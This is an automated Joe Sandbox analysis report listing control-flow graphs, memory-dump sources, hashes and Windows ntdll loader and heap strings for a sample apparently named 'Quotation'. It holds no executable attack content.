                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2614754852.0000000033E20000.00000040.00001000.00020000.00000000.sdmp, Offset: 33E20000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_33e20000_Quotation.jbxd
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              • Opcode ID: bd5be4a21be40773c944e2901ab4417b0217cc6813a1d4258bae6fd077d0ed64
                                                              • Instruction ID: c09c477dcef65d7efb65fea738ab550c51759e2640cfa0a6eb543f740f098ef7
                                                              • Opcode Fuzzy Hash: bd5be4a21be40773c944e2901ab4417b0217cc6813a1d4258bae6fd077d0ed64
                                                              • Instruction Fuzzy Hash: 58900271B0180802D140719C481570B080557D0303F55C012A1164915D862589556571

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 11 33e92f30-33e92f3c LdrInitializeThunk
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2614754852.0000000033E20000.00000040.00001000.00020000.00000000.sdmp, Offset: 33E20000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_33e20000_Quotation.jbxd
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              • Opcode ID: 07123ec389498fe9f2e9cfa79c629b03e4cfbf0273d26a6d94b16d035d97d9bd
                                                              • Instruction ID: b4bf17efdaebbb63b23d1ebff2d4f923302088e0aabf1d076c36fe96fd6369d6
                                                              • Opcode Fuzzy Hash: 07123ec389498fe9f2e9cfa79c629b03e4cfbf0273d26a6d94b16d035d97d9bd
                                                              • Instruction Fuzzy Hash: 559002B1B4140842D140719C4415B06080597E1302F55C016E1064914D8619CD566126

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 10 33e92ea0-33e92eac LdrInitializeThunk
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2614754852.0000000033E20000.00000040.00001000.00020000.00000000.sdmp, Offset: 33E20000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_33e20000_Quotation.jbxd
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              • Opcode ID: 85368433a47673e90b5360e51f001ff7fa46ed80e3894929f10bd717f17374f6
                                                              • Instruction ID: c9fbf71899d11ad14b23a9e36de9f27f481d1699f8f05ac240b028a6f508a439
                                                              • Opcode Fuzzy Hash: 85368433a47673e90b5360e51f001ff7fa46ed80e3894929f10bd717f17374f6
                                                              • Instruction Fuzzy Hash: BE9002B1B0140802D180719C4405746080557D0302F55C012A5064914E86598ED96665

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 9 33e92e80-33e92e8c LdrInitializeThunk
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2614754852.0000000033E20000.00000040.00001000.00020000.00000000.sdmp, Offset: 33E20000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_33e20000_Quotation.jbxd
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              • Opcode ID: eabe0fb6f9bd880e250878491f740f91bb716ba35978c3b91764cae4edad3547
                                                              • Instruction ID: 66deb7c92bcde6a0e013b407e4cd8f4e5f649d095c06b05f174b1a01693e830c
                                                              • Opcode Fuzzy Hash: eabe0fb6f9bd880e250878491f740f91bb716ba35978c3b91764cae4edad3547
                                                              • Instruction Fuzzy Hash: 70900271F0140902D141719C4405616080A57D0242F95C023A1024915ECA258A96A131


Control-flow Graph: control_flow_graph 8 33e92df0-33e92dfc LdrInitializeThunk
Similarity
• API ID: InitializeThunk
• String ID:
• API String ID: 2994545307-0


Control-flow Graph: control_flow_graph 7 33e92dd0-33e92ddc LdrInitializeThunk
Similarity
• API ID: InitializeThunk
• String ID:
• API String ID: 2994545307-0


Control-flow Graph: control_flow_graph 6 33e92d30-33e92d3c LdrInitializeThunk
Similarity
• API ID: InitializeThunk
• String ID:
• API String ID: 2994545307-0


Control-flow Graph: control_flow_graph 5 33e92d10-33e92d1c LdrInitializeThunk
Similarity
• API ID: InitializeThunk
• String ID:
• API String ID: 2994545307-0


Control-flow Graph: control_flow_graph 4 33e92ca0-33e92cac LdrInitializeThunk
Similarity
• API ID: InitializeThunk
• String ID:
• API String ID: 2994545307-0


Control-flow Graph: control_flow_graph 3 33e92c70-33e92c7c LdrInitializeThunk
Similarity
• API ID: InitializeThunk
• String ID:
• API String ID: 2994545307-0

Similarity
• API ID:
• String ID: @$@$CFGOptions$DisableExceptionChainValidation$DisableHeapLookaside$ExecuteOptions$FrontEndHeapDebugOptions$GlobalFlag$GlobalFlag2$Initializing the application verifier package failed with status 0x%08lx$LdrpInitializeExecutionOptions$MaxDeadActivationContexts$MaxLoaderThreads$MinimumStackCommitInBytes$RaiseExceptionOnPossibleDeadlock$ShutdownFlags$TracingFlags$UnloadEventTraceDepth$UseImpersonatedDeviceMap$minkernel\ntdll\ldrinit.c
• API String ID: 0-2160512332

Similarity
• API ID: DebugPrintTimes
• String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
• API String ID: 3446177414-1700792311

Similarity
• API ID:
• String ID: @$@$@$Control Panel\Desktop$Control Panel\Desktop\MuiCached$H/3$MachinePreferredUILanguages$PreferredUILanguages$PreferredUILanguagesPending$\Registry\Machine\Software\Policies\Microsoft\MUI\Settings
• API String ID: 0-3186455409

Similarity
• API ID:
• String ID: Free Heap block %p modified at %p after it was freed$HEAP: $HEAP[%wZ]: $Heap Segment at %p contains invalid NumberOfUnCommittedPages (%x != %x)$Heap Segment at %p contains invalid NumberOfUnCommittedRanges (%x != %x)$Heap block at %p has corrupted PreviousSize (%lx)$Heap block at %p has incorrect segment offset (%x)$Heap block at %p is not last block in segment (%p)$Heap entry %p has incorrect PreviousSize field (%04x instead of %04x)
• API String ID: 0-3591852110

Strings
• @, xrefs: 33E4D313
• Control Panel\Desktop\LanguageConfiguration, xrefs: 33E4D196
• H/3, xrefs: 33EAA843
• Control Panel\Desktop\MuiCached\MachineLanguageConfiguration, xrefs: 33E4D262
• \Registry\Machine\Software\Policies\Microsoft\MUI\Settings, xrefs: 33E4D0CF
• Software\Policies\Microsoft\Control Panel\Desktop, xrefs: 33E4D146
• @, xrefs: 33E4D2AF
• \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings\LanguageConfiguration, xrefs: 33E4D2C3
• @, xrefs: 33E4D0FD
Similarity
• API ID:
• String ID: @$@$@$Control Panel\Desktop\LanguageConfiguration$Control Panel\Desktop\MuiCached\MachineLanguageConfiguration$H/3$Software\Policies\Microsoft\Control Panel\Desktop$\Registry\Machine\Software\Policies\Microsoft\MUI\Settings$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings\LanguageConfiguration
• API String ID: 0-3546177236

APIs
• RtlDebugPrintTimes.NTDLL ref: 33EB5672
  • Part of subcall function 33E92BF0: LdrInitializeThunk.NTDLL ref: 33E92BFA
Similarity
• API ID: DebugInitializePrintThunkTimes
• String ID: !(CheckedFlags & ~HEAP_CREATE_VALID_MASK)$@$HEAP: $HEAP[%wZ]:
• API String ID: 3681346633-3570731704

APIs
• RtlDebugPrintTimes.NTDLL ref: 33E7D959
  • Part of subcall function 33E54859: RtlDebugPrintTimes.NTDLL ref: 33E548F7
Similarity
• API ID: DebugPrintTimes
• String ID: $$$$LdrShutdownProcess$Process 0x%p (%wZ) exiting$minkernel\ntdll\ldrinit.c
• API String ID: 3446177414-1975516107
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID: %s\%ld\%s$%s\%u-%u-%u-%u$AppContainerNamedObjects$BaseNamedObjects$Global\Session\%ld%s$\AppContainerNamedObjects$\BaseNamedObjects$\Sessions
                                                              • API String ID: 2994545307-3063724069
                                                              Similarity
                                                              • API ID:
                                                              • String ID: (!TrailingUCR)$((LONG)FreeEntry->Size > 1)$(LONG)FreeEntry->Size > 1$(UCRBlock != NULL)$HEAP: $HEAP[%wZ]:
                                                              • API String ID: 0-523794902
                                                              Similarity
                                                              • API ID:
                                                              • String ID: H/3$Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
                                                              • API String ID: 0-1394976480
                                                              Similarity
                                                              • API ID:
                                                              • String ID: API set$DLL %wZ was redirected to %wZ by %s$LdrpPreprocessDllName$LdrpPreprocessDllName for DLL %wZ failed with status 0x%08lx$SxS$minkernel\ntdll\ldrutil.c
                                                              • API String ID: 0-122214566
                                                              Similarity
                                                              • API ID:
                                                              • String ID: Delaying execution failed with status 0x%08lx$LDR:MRDATA: Process initialization failed with status 0x%08lx$NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop$Process initialization failed with status 0x%08lx$_LdrpInitialize$minkernel\ntdll\ldrinit.c
                                                              • API String ID: 0-792281065
                                                              Strings
                                                              • minkernel\ntdll\ldrredirect.c, xrefs: 33EC8181, 33EC81F5
                                                              • LdrpInitializeProcess, xrefs: 33E8C6C4
                                                              • LdrpInitializeImportRedirection, xrefs: 33EC8177, 33EC81EB
                                                              • Loading import redirection DLL: '%wZ', xrefs: 33EC8170
                                                              • Unable to build import redirection Table, Status = 0x%x, xrefs: 33EC81E5
                                                              • minkernel\ntdll\ldrinit.c, xrefs: 33E8C6C3
                                                              Similarity
                                                              • API ID:
                                                              • String ID: LdrpInitializeImportRedirection$LdrpInitializeProcess$Loading import redirection DLL: '%wZ'$Unable to build import redirection Table, Status = 0x%x$minkernel\ntdll\ldrinit.c$minkernel\ntdll\ldrredirect.c
                                                              • API String ID: 0-475462383
                                                              Strings
                                                              • SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx, xrefs: 33EC219F
                                                              • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p, xrefs: 33EC21BF
                                                              • RtlGetAssemblyStorageRoot, xrefs: 33EC2160, 33EC219A, 33EC21BA
                                                              • SXS: %s() passed the empty activation context, xrefs: 33EC2165
                                                              • SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx, xrefs: 33EC2178
                                                              • SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx, xrefs: 33EC2180
                                                              Similarity
                                                              • API ID:
                                                              • String ID: RtlGetAssemblyStorageRoot$SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p$SXS: %s() passed the empty activation context$SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx$SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx
                                                              • API String ID: 0-861424205
                                                              Similarity
                                                              • API ID:
                                                              • String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
                                                              • API String ID: 0-4253913091
                                                              Strings
                                                              • Failed to reallocate the system dirs string !, xrefs: 33EC82D7
                                                              • minkernel\ntdll\ldrinit.c, xrefs: 33EC82E8
                                                              • LdrpInitializePerUserWindowsDirectory, xrefs: 33EC82DE
                                                              Similarity
                                                              • API ID: DebugPrintTimes
                                                              • String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
                                                              • API String ID: 3446177414-1783798831
                                                              Strings
                                                              • minkernel\ntdll\ldrredirect.c, xrefs: 33ED4899
                                                              • LdrpCheckRedirection, xrefs: 33ED488F
                                                              • Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 33ED4888
                                                              Similarity
                                                              • API ID: DebugPrintTimes
                                                              • String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
                                                              • API String ID: 3446177414-3154609507
                                                              Similarity
                                                              • API ID: DebugPrintTimes
                                                              • String ID:
                                                              • API String ID: 3446177414-0
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID: This is located in the %s field of the heap header.$ -3`$HEAP: $HEAP[%wZ]: $Heap %p - headers modified (%p is %lx instead of %lx)
                                                              • API String ID: 2994545307-1487992068
                                                              Similarity
                                                              • API ID:
                                                              • String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlFreeHeap
                                                              • API String ID: 0-3061284088
                                                              Similarity
                                                              • API ID:
                                                              • String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
                                                              • API String ID: 0-3178619729
                                                              • Opcode ID: 09ef9538a0ea6bc7f6e336241fe32e588525418ab9e7dd8a37b71a14f303fc46
                                                              • Instruction ID: c870075f82706424d7e24b8cb0f6b5c333b7326b7104e4f816a86cccaa2d7352
                                                              • Opcode Fuzzy Hash: 09ef9538a0ea6bc7f6e336241fe32e588525418ab9e7dd8a37b71a14f303fc46
                                                              • Instruction Fuzzy Hash: 6413AF74A40755CFEB14CF68C8907A9BBF1FF49308F5881A9E899AB381D734A945CF90
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2614754852.0000000033E20000.00000040.00001000.00020000.00000000.sdmp, Offset: 33E20000, based on PE: true
                                                              • Associated: 00000003.00000002.2614754852.0000000033F49000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000003.00000002.2614754852.0000000033F4D000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000003.00000002.2614754852.0000000033FBE000.00000040.00001000.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_33e20000_Quotation.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: LdrResGetRCConfig Enter$LdrResGetRCConfig Exit$MUI$\U3
                                                              • API String ID: 0-3619838710
                                                              • Opcode ID: aec6decbcdcf14dc5a217e570805cfd59ec302e9f2bf5d7eb2ed17dac3b2faca
                                                              • Instruction ID: 17a85bc957e29baa8c594935954d0a5f3cbe1845ade640d96d925837b9debe7f
                                                              • Opcode Fuzzy Hash: aec6decbcdcf14dc5a217e570805cfd59ec302e9f2bf5d7eb2ed17dac3b2faca
                                                              • Instruction Fuzzy Hash: 5BB1BB79E187069FEB16CF68C981B9DB7B6BF44788F284529E851EB780D770E840CB41
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2614754852.0000000033E20000.00000040.00001000.00020000.00000000.sdmp, Offset: 33E20000, based on PE: true
                                                              • Associated: 00000003.00000002.2614754852.0000000033F49000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000003.00000002.2614754852.0000000033F4D000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000003.00000002.2614754852.0000000033FBE000.00000040.00001000.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_33e20000_Quotation.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: 6$8$LdrResFallbackLangList Enter$LdrResFallbackLangList Exit
                                                              • API String ID: 0-379654539
                                                              • Opcode ID: 2a53213a6c9fb943893700b8aec56d9e87219f5790dc26585c8d5cc7fdf5d9f4
                                                              • Instruction ID: b601f5548ea061eb3cb75a2449005f15ea510007007b63d05d66c72a3e73c9bb
                                                              • Opcode Fuzzy Hash: 2a53213a6c9fb943893700b8aec56d9e87219f5790dc26585c8d5cc7fdf5d9f4
                                                              • Instruction Fuzzy Hash: B8C18CB4508386CFEB12CF58C140B6AB7F4BF88748F04496AF995DB250EB35C949CB92
                                                              Strings
                                                              • .Local, xrefs: 33E828D8
                                                              • RtlpGetActivationContextDataStorageMapAndRosterHeader, xrefs: 33EC21D9, 33EC22B1
                                                              • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p, xrefs: 33EC22B6
                                                              • SXS: %s() passed the empty activation context, xrefs: 33EC21DE
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2614754852.0000000033E20000.00000040.00001000.00020000.00000000.sdmp, Offset: 33E20000, based on PE: true
                                                              • Associated: 00000003.00000002.2614754852.0000000033F49000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000003.00000002.2614754852.0000000033F4D000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000003.00000002.2614754852.0000000033FBE000.00000040.00001000.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_33e20000_Quotation.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: .Local$RtlpGetActivationContextDataStorageMapAndRosterHeader$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p$SXS: %s() passed the empty activation context
                                                              • API String ID: 0-1239276146
                                                              • Opcode ID: 0d59b126c572d4c90ddae0c52380428cf102a15b0f1a0a318cf6abc5893148fc
                                                              • Instruction ID: af067560f1caaf23a1c75b047283840e6dd0dce91a4d01fb61c84434f8028d36
                                                              • Opcode Fuzzy Hash: 0d59b126c572d4c90ddae0c52380428cf102a15b0f1a0a318cf6abc5893148fc
                                                              • Instruction Fuzzy Hash: 54A19C79D013299FDB24CF64C884B99B3B5BF58758F1441EAE848AB361D7319E81CF90
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2614754852.0000000033E20000.00000040.00001000.00020000.00000000.sdmp, Offset: 33E20000, based on PE: true
                                                              • Associated: 00000003.00000002.2614754852.0000000033F49000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000003.00000002.2614754852.0000000033F4D000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000003.00000002.2614754852.0000000033FBE000.00000040.00001000.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_33e20000_Quotation.jbxd
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID: HEAP: $HEAP[%wZ]: $ZwAllocateVirtualMemory failed %lx for heap %p (base %p, size %Ix)$`
                                                              • API String ID: 2994545307-2586055223
                                                              • Opcode ID: 758b9c7d7c890eccad1d9c17e71996b8af84db64af89d49ae0ffc7dfb8f71569
                                                              • Instruction ID: d99fb3f3cfc21956b1b95e29f5a0586477314204d1f2d7d6101a034a82e28f69
                                                              • Opcode Fuzzy Hash: 758b9c7d7c890eccad1d9c17e71996b8af84db64af89d49ae0ffc7dfb8f71569
                                                              • Instruction Fuzzy Hash: E8613776A04744AFE311CB28E944F6777F8EF84B58F080558F9948B6A1D734E845CB61
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2614754852.0000000033E20000.00000040.00001000.00020000.00000000.sdmp, Offset: 33E20000, based on PE: true
                                                              • Associated: 00000003.00000002.2614754852.0000000033F49000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000003.00000002.2614754852.0000000033F4D000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000003.00000002.2614754852.0000000033FBE000.00000040.00001000.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_33e20000_Quotation.jbxd
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID: HEAP: $HEAP[%wZ]: $VirtualProtect Failed 0x%p %x$VirtualQuery Failed 0x%p %x
                                                              • API String ID: 2994545307-1391187441
                                                              • Opcode ID: 983ed4a6db0bf6f02c50ee48bcd8df09637e1419a9c00bc8cabb9caf35bccec1
                                                              • Instruction ID: f8505e45aaa66705d9535c2aac5fda0095c9c7ab5c21242392f80c245ff08cd4
                                                              • Opcode Fuzzy Hash: 983ed4a6db0bf6f02c50ee48bcd8df09637e1419a9c00bc8cabb9caf35bccec1
                                                              • Instruction Fuzzy Hash: D031E136A11219EFDB01CB99DC84F9ABBF8EF49760F154091F864AB291DB70ED40CB60
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2614754852.0000000033E20000.00000040.00001000.00020000.00000000.sdmp, Offset: 33E20000, based on PE: true
                                                              • Associated: 00000003.00000002.2614754852.0000000033F49000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000003.00000002.2614754852.0000000033F4D000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000003.00000002.2614754852.0000000033FBE000.00000040.00001000.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_33e20000_Quotation.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: @$BuildLabEx$E3$\Registry\Machine\SOFTWARE\Microsoft\Windows NT\CurrentVersion
                                                              • API String ID: 0-472099806
                                                              • Opcode ID: 4dd0507e6de23adeaafdd13239ae3a95ee5485203228978708ef77071a5cdf2e
                                                              • Instruction ID: 40ac439f859a29fb7791f4aa524696341a5619033b13c29f7875f8e88e59f5b2
                                                              • Opcode Fuzzy Hash: 4dd0507e6de23adeaafdd13239ae3a95ee5485203228978708ef77071a5cdf2e
                                                              • Instruction Fuzzy Hash: 3631AD76D1071CABEB11DF95CD40EDEBBBDEB84750F014025F914AB6A0E7389E058BA0
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2614754852.0000000033E20000.00000040.00001000.00020000.00000000.sdmp, Offset: 33E20000, based on PE: true
                                                              • Associated: 00000003.00000002.2614754852.0000000033F49000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000003.00000002.2614754852.0000000033F4D000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000003.00000002.2614754852.0000000033FBE000.00000040.00001000.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_33e20000_Quotation.jbxd
                                                              Similarity
                                                              • API ID: DebugPrintTimes
                                                              • String ID:
                                                              • API String ID: 3446177414-0
                                                              • Opcode ID: 88a28a63f8a8fc0db3a6e2a402135902d27a83bafcd1c210aeb80df2e59142af
                                                              • Instruction ID: ef04ca4cfb3106c2157011ff37c6688c8833c4a585ab874e672a0ed4d168d148
                                                              • Opcode Fuzzy Hash: 88a28a63f8a8fc0db3a6e2a402135902d27a83bafcd1c210aeb80df2e59142af
                                                              • Instruction Fuzzy Hash: 9951FE79E04715EFFB06CB64C944BAEBBB8BF44369F144029F542A7690DB70D921DB80
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2614754852.0000000033E20000.00000040.00001000.00020000.00000000.sdmp, Offset: 33E20000, based on PE: true
                                                              • Associated: 00000003.00000002.2614754852.0000000033F49000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000003.00000002.2614754852.0000000033F4D000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000003.00000002.2614754852.0000000033FBE000.00000040.00001000.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_33e20000_Quotation.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: @$DelegatedNtdll$\SystemRoot\system32\
                                                              • API String ID: 0-2391371766
                                                              • Opcode ID: 3dee1f70d7bdee31f2a5634479320fad2b710822a27c9bb7aa80f35bffc59db1
                                                              • Instruction ID: 4052c0881ff1575ede950e496878671732c4d23efc3b8624a1c22936b07707bb
                                                              • Opcode Fuzzy Hash: 3dee1f70d7bdee31f2a5634479320fad2b710822a27c9bb7aa80f35bffc59db1
                                                              • Instruction Fuzzy Hash: CDB1CEB6A08345AFE311DF54C880F5BB7F8FB44758F440929FA90AB290D774E806CB92
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2614754852.0000000033E20000.00000040.00001000.00020000.00000000.sdmp, Offset: 33E20000, based on PE: true
                                                              • Associated: 00000003.00000002.2614754852.0000000033F49000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000003.00000002.2614754852.0000000033F4D000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000003.00000002.2614754852.0000000033FBE000.00000040.00001000.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_33e20000_Quotation.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: FilterFullPath$UseFilter$\??\
                                                              • API String ID: 0-2779062949
                                                              • Opcode ID: 190593837a84b421cdd651749f2e1911124284a116218c85f5d6057708770f95
                                                              • Instruction ID: 9172f0588429c58a0706074f7f9783d5b3a60d57b39fb770231d21e6a65484e8
                                                              • Opcode Fuzzy Hash: 190593837a84b421cdd651749f2e1911124284a116218c85f5d6057708770f95
                                                              • Instruction Fuzzy Hash: 28A1AE76D116289BDB21DF28DC88BDAB7B8EF48714F0401E9E909EB210E7359E84CF54
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2614754852.0000000033E20000.00000040.00001000.00020000.00000000.sdmp, Offset: 33E20000, based on PE: true
                                                              • Associated: 00000003.00000002.2614754852.0000000033F49000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000003.00000002.2614754852.0000000033F4D000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000003.00000002.2614754852.0000000033FBE000.00000040.00001000.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_33e20000_Quotation.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: @$LdrpResMapFile Enter$LdrpResMapFile Exit
                                                              • API String ID: 0-318774311
                                                              • Opcode ID: ebe62bdb97e2ebe74a8f17965584480c0f4b5f3b33f4be941960bda315582922
                                                              • Instruction ID: 5515111d827e368d8421d764731166b33fe3e874fa3761f40e9b917404b8a754
                                                              • Opcode Fuzzy Hash: ebe62bdb97e2ebe74a8f17965584480c0f4b5f3b33f4be941960bda315582922
                                                              • Instruction Fuzzy Hash: D7818AB5A18340AFE711CB14C880B6BB7E8FF85794F44192DF9809B790EB74D904CB62
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2614754852.0000000033E20000.00000040.00001000.00020000.00000000.sdmp, Offset: 33E20000, based on PE: true
                                                              • Associated: 00000003.00000002.2614754852.0000000033F49000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000003.00000002.2614754852.0000000033F4D000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000003.00000002.2614754852.0000000033FBE000.00000040.00001000.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_33e20000_Quotation.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: %$&$@
                                                              • API String ID: 0-1537733988
                                                              • Opcode ID: 9d78f1fcc0a8fdbd4e2c15c88e4d68c9e90b4599d9c1df652770a7a8041f6854
                                                              • Instruction ID: 4b1ab2bb891de270cd8ad783f2dba68f855bde1378b92e6ecd9c8eff710e2453
                                                              • Opcode Fuzzy Hash: 9d78f1fcc0a8fdbd4e2c15c88e4d68c9e90b4599d9c1df652770a7a8041f6854
                                                              • Instruction Fuzzy Hash: F8719C74E083419FE340CF24D980A1FBBE9BF84B58F548A1DF4A99B691D730D909CB92
                                                              Strings
                                                              • TargetNtPath, xrefs: 33F2B82F
                                                              • GlobalizationUserSettings, xrefs: 33F2B834
                                                              • \Registry\Machine\SYSTEM\CurrentControlSet\Control\International, xrefs: 33F2B82A
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2614754852.0000000033E20000.00000040.00001000.00020000.00000000.sdmp, Offset: 33E20000, based on PE: true
                                                              • Associated: 00000003.00000002.2614754852.0000000033F49000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000003.00000002.2614754852.0000000033F4D000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000003.00000002.2614754852.0000000033FBE000.00000040.00001000.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_33e20000_Quotation.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: GlobalizationUserSettings$TargetNtPath$\Registry\Machine\SYSTEM\CurrentControlSet\Control\International
                                                              • API String ID: 0-505981995
                                                              • Opcode ID: 6d4c85b5723557ec348590b1496ec5324128b9f4e8f05419e112408fd7a3a5ab
                                                              • Instruction ID: 59c27b5d21457bcbc16d4b9b9cc17deb2caff32e3522487b0b232138f7892df1
                                                              • Opcode Fuzzy Hash: 6d4c85b5723557ec348590b1496ec5324128b9f4e8f05419e112408fd7a3a5ab
                                                              • Instruction Fuzzy Hash: F461AF76D41229EFDB20DB55CC88B9ABBB8AF14750F8105E5E908E7290CB349E84CF90
                                                              Strings
                                                              • RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix), xrefs: 33EAE6C6
                                                              • HEAP[%wZ]: , xrefs: 33EAE6A6
                                                              • HEAP: , xrefs: 33EAE6B3
